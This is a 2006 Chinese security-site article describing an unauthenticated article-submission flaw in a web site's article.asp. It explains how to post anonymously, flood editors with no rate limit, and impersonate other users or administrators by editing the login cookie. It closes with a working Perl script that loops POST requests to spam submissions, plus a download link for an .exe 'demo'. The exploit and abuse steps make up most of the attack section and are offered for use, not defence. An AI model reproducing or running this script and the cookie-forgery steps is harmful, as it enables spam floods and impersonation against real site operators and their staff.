执着成就未来 技术成就梦想
文字横幅以及760*60黄金广告位置招租,欢迎恰谈! 广告业务联系QQ:8019399 声明:在本站所投放广告内容均与本站立场无关!

您现在的位置: 中国安全在线 >> 攻防技术 >> 入侵攻击 >> 文章正文 用户登录 新用户注册
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
LB5000XP论坛配合SERV-U获取系统管
利用动网论坛7.0获取主机权限
乔客论坛upload.asp 文件简单分析
漂亮但不安全的CTB论坛--CTB论坛再
动网论坛有史以来最大的安全漏洞
动网论坛上传文件漏洞的原理以及攻
用telnet的方法导出、导入论坛mysq
Discuz论坛短消息未限制发送次数漏
PHPWIND1.3.6论坛漏洞分析
黑客入侵论坛各种手段大暴光
乔客论坛存在的安全隐患
作者:佚名 来源:安全在线 更新时间:2006-5-4 【字体:
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表评论

阅读提示: 这个漏洞出现在:个人专栏-发表我的文章,当用户登陆后,点发表我的

文章时,有个文本框出现的是你的登陆名,发表文章是以你的

名义的,但由于这个article.asp缺少认证,我们不必登陆直接提交如下url,

这时你可以匿名发表文章给各个主编:

http://127.0.0.1/1/article.asp?action=add

这样在查看数据库中的article_add表中的username栏时为空,也就是不能只

知道是谁发的,即使你发表一些过激的言论管理员也不能拿你

怎么样,不能禁用你的帐号。

要命的是程序对用户发表文章的间隔也没有限制,我写了个程序,是在本

机测试的,一分钟能刷几百封,而且是匿名的,如果放在十台机上

跑一天,你算一下在文栏管理-网友发布中要收到多少投稿,这不是影响了文

栏主编的正常工作。

更要命的是还有一招借刀杀人,username栏时不为空,而是用别人的名字

,这个方法是以你的名义先登陆,然后修改cookie中的用户名

为你要冒充发言的人,然后直接提交如下url:

http://127.0.0.1/1/article.asp?action=add 其中的127.0.0.1/1/要改为

网站article.asp的真实路径,这样你可以看到文本框中出现的

就是你要冒充的人的名字了,查看数据库中的article_add表中的username栏

就是这个人说的了,你可以冒充管理员给各文栏主编下命令了。

我做了个演示动画,大家可以下一个看看,动画也演示了炸弹的威力!

下载地址:

http://members.lycos.co.uk/zhuoqing/king.exe

注意: 一定要用flashget下,ie下不了

已下是动画教程中涉及到的Exploit

#!/usr/bin/perl

# code by pinkeyes

print "pinkeyes is your best friend\n";

print "welcome to 海洋顶端网,and http://xiaomutou.51.net/bbs/\n";

use HTTP::Request::Common;

use HTTP::Response;

use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ARGC = @ARGV;

if ($ARGC != 1) {

print "usage: $0 <times>";

exit(1);

}

$times = shift;

for($k=1;$k<=100 * $times;$k++){

for ($j=1;$j<=$times;$j++){

for ($i=1;$i<=$times;$i++) {

$response = $ua->request(POST 'http://127.0.0.1//1//article.asp?action=chk&#39;,

[

csid => "$j-$i",

topic => '漏洞演示',

word =>'fire in the hole',

login_username => 'pinkeyes'

]

);

if ($response->content =~ /已成功发布了一篇文章/) {

print "mail $i reg succeed!\n";

}

else {

print "mail $i reg failed!\n";

}

}

}

}

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力

文章录入:ls1238    责任编辑:ls1238 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系方式 | 友 情链接 | 关于我们 | 网站留言 |
    Copyright ?2003-2008 www.cnsafer.com All Rights Reserved.
    如有意见请与我们联系 Email:admin#mail.cnsafer.com 联系QQ:8589101
    中国安全在线友情提示:建议使用IE6.0或以上版本, 分辩率1024*768进行浏览
    敢想 敢做 挑战自我 努力做最好 打造最优秀的新手成长 第一起跑线
    中网科技有限公司 技术支持 鄂ICP备05006475号